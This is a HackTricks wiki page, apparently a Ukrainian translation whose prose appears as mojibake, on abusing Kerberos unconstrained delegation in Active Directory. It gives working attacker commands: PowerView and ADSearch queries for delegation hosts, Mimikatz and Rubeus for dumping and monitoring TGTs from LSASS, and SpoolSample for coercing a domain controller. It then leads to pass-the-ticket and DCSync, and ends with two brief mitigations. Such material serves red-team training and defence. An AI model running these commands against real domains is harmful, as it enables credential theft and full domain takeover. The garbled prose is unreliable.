# Unconstrained Delegation
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Unconstrained delegation
Π¦Π΅ ΡΡΠ½ΠΊΡΡΡ, ΡΠΊΡ Π°Π΄ΠΌΡΠ½ΡΡΡΡΠ°ΡΠΎΡ Π΄ΠΎΠΌΠ΅Π½Ρ ΠΌΠΎΠΆΠ΅ Π½Π°Π»Π°ΡΡΡΠ²Π°ΡΠΈ Π΄Π»Ρ Π±ΡΠ΄Ρ-ΡΠΊΠΎΠ³ΠΎ **ΠΊΠΎΠΌΠΏ'ΡΡΠ΅ΡΠ°** Π² Π΄ΠΎΠΌΠ΅Π½Ρ. Π’ΠΎΠ΄Ρ, ΡΠΎΡΠ°Π·Ρ, ΠΊΠΎΠ»ΠΈ **ΠΊΠΎΡΠΈΡΡΡΠ²Π°Ρ Π²Ρ
ΠΎΠ΄ΠΈΡΡ** Π½Π° ΠΊΠΎΠΌΠΏ'ΡΡΠ΅Ρ, **ΠΊΠΎΠΏΡΡ TGT** ΡΡΠΎΠ³ΠΎ ΠΊΠΎΡΠΈΡΡΡΠ²Π°ΡΠ° Π±ΡΠ΄Π΅ **Π½Π°Π΄ΡΡΠ»Π°Π½Π° Π²ΡΠ΅ΡΠ΅Π΄ΠΈΠ½Ρ TGS**, Π½Π°Π΄Π°Π½ΠΎΠ³ΠΎ DC **Ρ Π·Π±Π΅ΡΠ΅ΠΆΠ΅Π½Π° Π² ΠΏΠ°ΠΌ'ΡΡΡ Π² LSASS**. ΠΡΠΆΠ΅, ΡΠΊΡΠΎ Ρ Π²Π°Ρ Ρ ΠΏΡΠΈΠ²ΡΠ»Π΅Ρ Π°Π΄ΠΌΡΠ½ΡΡΡΡΠ°ΡΠΎΡΠ° Π½Π° ΠΌΠ°ΡΠΈΠ½Ρ, Π²ΠΈ Π·ΠΌΠΎΠΆΠ΅ΡΠ΅ **Π²ΠΈΠ²Π°Π½ΡΠ°ΠΆΠΈΡΠΈ ΠΊΠ²ΠΈΡΠΊΠΈ ΡΠ° Π²ΠΈΠ΄Π°Π²Π°ΡΠΈ ΡΠ΅Π±Π΅ Π·Π° ΠΊΠΎΡΠΈΡΡΡΠ²Π°ΡΡΠ²** Π½Π° Π±ΡΠ΄Ρ-ΡΠΊΡΠΉ ΠΌΠ°ΡΠΈΠ½Ρ.
ΠΡΠΆΠ΅, ΡΠΊΡΠΎ Π°Π΄ΠΌΡΠ½ΡΡΡΡΠ°ΡΠΎΡ Π΄ΠΎΠΌΠ΅Π½Ρ Π²Ρ
ΠΎΠ΄ΠΈΡΡ Π½Π° ΠΊΠΎΠΌΠΏ'ΡΡΠ΅Ρ Π· Π°ΠΊΡΠΈΠ²ΠΎΠ²Π°Π½ΠΎΡ ΡΡΠ½ΠΊΡΡΡΡ "Unconstrained Delegation", Ρ Ρ Π²Π°Ρ Ρ Π»ΠΎΠΊΠ°Π»ΡΠ½Ρ Π°Π΄ΠΌΡΠ½ΡΡΡΡΠ°ΡΠΈΠ²Π½Ρ ΠΏΡΠΈΠ²ΡΠ»Π΅Ρ Π½Π° ΡΡΠΉ ΠΌΠ°ΡΠΈΠ½Ρ, Π²ΠΈ Π·ΠΌΠΎΠΆΠ΅ΡΠ΅ Π²ΠΈΠ²Π°Π½ΡΠ°ΠΆΠΈΡΠΈ ΠΊΠ²ΠΈΡΠΎΠΊ Ρ Π²ΠΈΠ΄Π°Π²Π°ΡΠΈ ΡΠ΅Π±Π΅ Π·Π° Π°Π΄ΠΌΡΠ½ΡΡΡΡΠ°ΡΠΎΡΠ° Π΄ΠΎΠΌΠ΅Π½Ρ Π±ΡΠ΄Ρ-Π΄Π΅ (ΠΏΡΠ΄Π²ΠΈΡΠ΅Π½Π½Ρ ΠΏΡΠΈΠ²ΡΠ»Π΅ΡΠ² Π΄ΠΎΠΌΠ΅Π½Ρ).
ΠΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ **Π·Π½Π°ΠΉΡΠΈ ΠΎΠ±'ΡΠΊΡΠΈ ΠΊΠΎΠΌΠΏ'ΡΡΠ΅ΡΡΠ² Π· ΡΠΈΠΌ Π°ΡΡΠΈΠ±ΡΡΠΎΠΌ**, ΠΏΠ΅ΡΠ΅Π²ΡΡΡΡΡΠΈ, ΡΠΈ Π°ΡΡΠΈΠ±ΡΡ [userAccountControl](https://msdn.microsoft.com/en-us/library/ms680832\(v=vs.85\).aspx) ΠΌΡΡΡΠΈΡΡ [ADS\_UF\_TRUSTED\_FOR\_DELEGATION](https://msdn.microsoft.com/en-us/library/aa772300\(v=vs.85\).aspx). ΠΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ Π·ΡΠΎΠ±ΠΈΡΠΈ ΡΠ΅ Π·Π° Π΄ΠΎΠΏΠΎΠΌΠΎΠ³ΠΎΡ LDAP-ΡΡΠ»ΡΡΡΠ° β(userAccountControl:1.2.840.113556.1.4.803:=524288)β, ΡΠΎ ΡΠΎΠ±ΠΈΡΡ powerview:
# List unconstrained computers
## Powerview
Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
## ADSearch
ADSearch.exe --search "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" --attributes samaccountname,dnshostname,operatingsystem
# Export tickets with Mimikatz
privilege::debug
sekurlsa::tickets /export #Recommended way
kerberos::list /export #Another way
# Monitor logins and export new tickets
.\Rubeus.exe monitor /targetuser:<username> /interval:10 #Check every 10s for new TGTs
ΠΠ°Π²Π°Π½ΡΠ°ΠΆΡΠ΅ ΠΊΠ²ΠΈΡΠΎΠΊ Π°Π΄ΠΌΡΠ½ΡΡΡΡΠ°ΡΠΎΡΠ° (Π°Π±ΠΎ ΠΊΠΎΡΠΈΡΡΡΠ²Π°ΡΠ°-ΠΆΠ΅ΡΡΠ²ΠΈ) Π² ΠΏΠ°ΠΌ'ΡΡΡ Π·Π° Π΄ΠΎΠΏΠΎΠΌΠΎΠ³ΠΎΡ **Mimikatz** Π°Π±ΠΎ **Rubeus Π΄Π»Ρ** [**Pass the Ticket**](pass-the-ticket.md)**.**\
ΠΡΠ»ΡΡΠ΅ ΡΠ½ΡΠΎΡΠΌΠ°ΡΡΡ: [https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/](https://www.harmj0y.net/blog/activedirectory/s4u2pwnage/)\
[**ΠΡΠ»ΡΡΠ΅ ΡΠ½ΡΠΎΡΠΌΠ°ΡΡΡ ΠΏΡΠΎ Unconstrained delegation Π½Π° ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation)
### **Force Authentication**
Π―ΠΊΡΠΎ Π·Π»ΠΎΠ²ΠΌΠΈΡΠ½ΠΈΠΊ Π·ΠΌΠΎΠΆΠ΅ **Π·Π»Π°ΠΌΠ°ΡΠΈ ΠΊΠΎΠΌΠΏ'ΡΡΠ΅Ρ, Π΄ΠΎΠ·Π²ΠΎΠ»Π΅Π½ΠΈΠΉ Π΄Π»Ρ "Unconstrained Delegation"**, Π²ΡΠ½ ΠΌΠΎΠΆΠ΅ **ΠΎΠ±ΠΌΠ°Π½ΡΡΠΈ** **ΡΠ΅ΡΠ²Π΅Ρ Π΄ΡΡΠΊΡ**, ΡΠΎΠ± **Π°Π²ΡΠΎΠΌΠ°ΡΠΈΡΠ½ΠΎ ΡΠ²ΡΠΉΡΠΈ** Π½Π° Π½ΡΠΎΠ³ΠΎ, **Π·Π±Π΅ΡΡΠ³Π°ΡΡΠΈ TGT** Π² ΠΏΠ°ΠΌ'ΡΡΡ ΡΠ΅ΡΠ²Π΅ΡΠ°.\
Π’ΠΎΠ΄Ρ Π·Π»ΠΎΠ²ΠΌΠΈΡΠ½ΠΈΠΊ Π·ΠΌΠΎΠΆΠ΅ Π²ΠΈΠΊΠΎΠ½Π°ΡΠΈ **Π°ΡΠ°ΠΊΡ Pass the Ticket, ΡΠΎΠ± Π²ΠΈΠ΄Π°Π²Π°ΡΠΈ ΡΠ΅Π±Π΅ Π·Π°** ΠΎΠ±Π»ΡΠΊΠΎΠ²ΠΈΠΉ Π·Π°ΠΏΠΈΡ ΠΊΠΎΠΌΠΏ'ΡΡΠ΅ΡΠ° ΡΠ΅ΡΠ²Π΅ΡΠ° Π΄ΡΡΠΊΡ.
Π©ΠΎΠ± Π·ΠΌΡΡΠΈΡΠΈ ΡΠ΅ΡΠ²Π΅Ρ Π΄ΡΡΠΊΡ ΡΠ²ΡΠΉΡΠΈ Π½Π° Π±ΡΠ΄Ρ-ΡΠΊΡ ΠΌΠ°ΡΠΈΠ½Ρ, Π²ΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ Π²ΠΈΠΊΠΎΡΠΈΡΡΠΎΠ²ΡΠ²Π°ΡΠΈ [**SpoolSample**](https://github.com/leechristensen/SpoolSample):
```bash
.\SpoolSample.exe
```
Π―ΠΊΡΠΎ TGT ΠΎΡΡΠΈΠΌΠ°Π½ΠΎ Π²ΡΠ΄ ΠΊΠΎΠ½ΡΡΠΎΠ»Π΅ΡΠ° Π΄ΠΎΠΌΠ΅Π½Ρ, Π²ΠΈ ΠΌΠΎΠΆΠ΅ΡΠ΅ Π²ΠΈΠΊΠΎΠ½Π°ΡΠΈ [**DCSync attack**](acl-persistence-abuse/#dcsync) Ρ ΠΎΡΡΠΈΠΌΠ°ΡΠΈ Π²ΡΡ Ρ
Π΅ΡΡ Π· DC.\
[**ΠΡΠ»ΡΡΠ΅ ΡΠ½ΡΠΎΡΠΌΠ°ΡΡΡ ΠΏΡΠΎ ΡΡ Π°ΡΠ°ΠΊΡ Π½Π° ired.team.**](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation)
**ΠΡΡ ΡΠ½ΡΡ ΡΠΏΠΎΡΠΎΠ±ΠΈ ΡΠΏΡΠΎΠ±ΡΠ²Π°ΡΠΈ ΠΏΡΠΈΠΌΡΡΠΈΡΠΈ Π°ΡΡΠ΅Π½ΡΠΈΡΡΠΊΠ°ΡΡΡ:**
{% content-ref url="printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](printers-spooler-service-abuse.md)
{% endcontent-ref %}
### ΠΠΌΠ΅Π½ΡΠ΅Π½Π½Ρ ΡΠΈΠ·ΠΈΠΊΡΠ²
* ΠΠ±ΠΌΠ΅ΠΆΡΠ΅ Π²Ρ
ΠΎΠ΄ΠΈ DA/Admin Π΄ΠΎ ΠΊΠΎΠ½ΠΊΡΠ΅ΡΠ½ΠΈΡ
ΡΠ΅ΡΠ²ΡΡΡΠ²
* ΠΡΡΠ°Π½ΠΎΠ²ΡΡΡ "ΠΠ±Π»ΡΠΊΠΎΠ²ΠΈΠΉ Π·Π°ΠΏΠΈΡ Ρ ΡΡΡΠ»ΠΈΠ²ΠΈΠΌ Ρ Π½Π΅ ΠΌΠΎΠΆΠ΅ Π±ΡΡΠΈ Π΄Π΅Π»Π΅Π³ΠΎΠ²Π°Π½ΠΈΠΉ" Π΄Π»Ρ ΠΏΡΠΈΠ²ΡΠ»Π΅ΠΉΠΎΠ²Π°Π½ΠΈΡ
ΠΎΠ±Π»ΡΠΊΠΎΠ²ΠΈΡ
Π·Π°ΠΏΠΈΡΡΠ².
{% hint style="success" %}
ΠΠΈΠ²ΡΠ°ΠΉΡΠ΅ ΡΠ° ΠΏΡΠ°ΠΊΡΠΈΠΊΡΠΉΡΠ΅ AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
ΠΠΈΠ²ΡΠ°ΠΉΡΠ΅ ΡΠ° ΠΏΡΠ°ΠΊΡΠΈΠΊΡΠΉΡΠ΅ GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
ΠΡΠ΄ΡΡΠΈΠΌΠ°ΠΉΡΠ΅ HackTricks
* ΠΠ΅ΡΠ΅Π²ΡΡΡΠ΅ [**ΠΏΠ»Π°Π½ΠΈ ΠΏΡΠ΄ΠΏΠΈΡΠΊΠΈ**](https://github.com/sponsors/carlospolop)!
* **ΠΡΠΈΡΠ΄Π½ΡΠΉΡΠ΅ΡΡ Π΄ΠΎ** π¬ [**Π³ΡΡΠΏΠΈ Discord**](https://discord.gg/hRep4RUj7f) Π°Π±ΠΎ [**Π³ΡΡΠΏΠΈ Telegram**](https://t.me/peass) Π°Π±ΠΎ **ΡΠ»ΡΠ΄ΠΊΡΠΉΡΠ΅** Π·Π° Π½Π°ΠΌΠΈ Π² **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **ΠΡΠ»ΡΡΡΡΡ Ρ
Π°ΠΊΠ΅ΡΡΡΠΊΠΈΠΌΠΈ ΡΡΡΠΊΠ°ΠΌΠΈ, Π½Π°Π΄ΡΠΈΠ»Π°ΡΡΠΈ PR Π΄ΠΎ** [**HackTricks**](https://github.com/carlospolop/hacktricks) ΡΠ° [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ΡΠ΅ΠΏΠΎΠ·ΠΈΡΠΎΡΡΡΠ² Π½Π° GitHub.
{% endhint %}